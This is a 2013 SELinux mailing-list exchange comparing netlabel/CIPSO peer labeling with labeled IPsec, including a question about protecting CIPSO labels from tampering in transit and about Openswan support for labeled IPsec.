Great, thank you guys for the clarification. Unfortunately I can't explain too much more about our specific configuration, but I think I am headed down the correct path now with the netlabel/CIPSO peer labeling. Just a general question about the CIPSO labeling: Is there anything that SELinux does to prevent an adversary from modifying the CIPSO label while on the wire? From what I can tell one would have to rely on other security measures like authentication/encryption to prevent this. I guess this may be a benefit of IPSec peer labeling since it provides authentication and encryption in addition to network labeling. The reason I ruled that out IPSec labeling is that we are using Openswan for IPSec and it is my understanding after talking with Josh Brindle that labeling is not supported in Openswan. Are there any plans to bring labeled associations to Openswan? Blake Langland -----Original Message----- From: Paul Moore [mailto:paul@xxxxxxxxxxxxxx] Sent: Wednesday, March 13, 2013 7:03 AM To: Langland, Blake Cc: Stephen Smalley; selinux@xxxxxxxxxxxxx Subject: Re: SELinux network labeling On Wednesday, March 13, 2013 09:36:39 AM Stephen Smalley wrote: > netlabel vs labeled ipsec: netlabel only supports passing MLS labels > via CIPSO, no user:role:type preservation. labeled ipsec supports > passing the entire security context, including user:role:type. Just one quick comment, and a word of caution, that the differences between CIPSO and labeled IPsec are much greater than what is described above. >From a SELinux policy perspective Stephen does touch on the main point: CIPSO labeled traffic will look like system_u:object_r:netlabel_peer_t:{MLS-LABEL} to SELinux regardless of the user:role:type of the sender (only the "MLS- LABEL" information is passed over the wire) while labeled IPsec will pass the full context over the wire. However, stepping back just the SELinux policy there are other differences between the two protocols that need to be considered when building a full solution. -- paul moore www.paul-moore.com -- This message was distributed to subscribers of the selinux mailing list. If you no longer wish to subscribe, send mail to majordomo@xxxxxxxxxxxxx with the words "unsubscribe selinux" without quotes as the message.
